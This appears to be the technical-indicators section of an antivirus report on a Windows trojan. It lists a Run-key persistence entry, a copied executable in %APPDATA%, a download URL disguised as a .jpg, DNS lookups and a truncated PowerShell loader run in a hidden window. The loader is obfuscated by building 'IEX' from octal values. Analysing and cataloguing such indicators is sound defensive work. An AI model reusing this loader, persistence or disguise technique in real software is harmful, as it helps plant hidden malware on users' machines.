Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\<File name>.exe'
- %APPDATA%\<File name>.exe
- http://www.m9#.net/uploads/15885731361.jpg
- DNS ASK google.com
- DNS ASK m9#.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cM1 $c145;$JosJgqVKgZxVQq=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c COPY <Full path to file> %APPDATA%
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cM1 $c145;$JosJgqVKgZxVQq=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99...